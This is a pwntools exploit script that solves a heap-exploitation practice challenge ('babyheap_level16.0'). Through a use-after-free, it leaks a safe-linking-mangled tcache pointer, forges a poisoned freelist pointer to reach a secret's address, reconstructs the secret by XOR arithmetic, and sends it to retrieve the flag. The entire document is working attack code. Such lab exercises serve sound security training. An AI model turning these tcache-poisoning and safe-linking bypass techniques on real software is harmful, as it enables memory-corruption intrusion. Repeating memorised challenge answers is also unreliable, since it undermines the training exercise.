from pwn import *
# secret at 00430000 + 49552 = 0x43c190
r = process("/challenge/babyheap_level16.0")
secval_1 = 0x43c190
for i in range(0,2):
	r.sendline(b"malloc")
	r.sendline(str(i).encode())
	r.sendline(b"32")
r.sendline(b"free")
r.sendline(b"0")
r.sendline(b"puts")
r.read()
r.sendline(b"0")
pos = r.read()[32:-904]
pos = int.from_bytes(pos,byteorder='little')
log.info(f"Postision Shifted >>  12 {hex(pos)}")
log.info(f"XOR value {hex(pos^secval_1)}")
#.sendline(b"scanf")
#r.sendline(b"0")
#r.sendline(p64(b'A'*8))
r.sendline(b"free")
r.sendline(b"1")
r.sendline(b"scanf")
r.sendline(b"1")
r.sendline(p64(secval_1^pos))
log.info(f"null out second 8 byte of secret")
for i in range(0,2):
        r.sendline(b"malloc")
        r.sendline(str(i).encode())
        r.sendline(b"32")
r.sendline(b"free")
r.sendline(b"0")
r.sendline(b"puts")
r.read()
r.read()
r.sendline(b"0")
secval_2 = r.read()[32:-912]
secval_2 = int.from_bytes(secval_2,byteorder='little')
log.info(f"Get the value of first 8 byte but not the orginal {hex(secval_2)}")
for i in range(0,2):
        r.sendline(b"malloc")
        r.sendline(str(i).encode())
        r.sendline(b"32")
for i in range(0,2):
        r.sendline(b"free")
        r.sendline(str(i).encode())
r.sendline(b"puts")
r.read()
r.sendline(b"1")
secval_1_ptr = r.read()[32:-1025]
secval_1_ptr = int.from_bytes(secval_1_ptr,byteorder='little')
xor_sec = hex(int(hex(secval_1_ptr),16)^pos)
double = hex(int(xor_sec,16)^secval_2)
secret = hex(int(hex(secval_1_ptr),16)^int(double,16))
secret = int(secret,16)^(0x43c190 >> 12)
log.info(f"Get the orginal secret for first 8 byte {hex(secret)}")
r.sendline(b"send_flag")
r.sendline(p64(secret)+p64(0x0))
r.interactive()
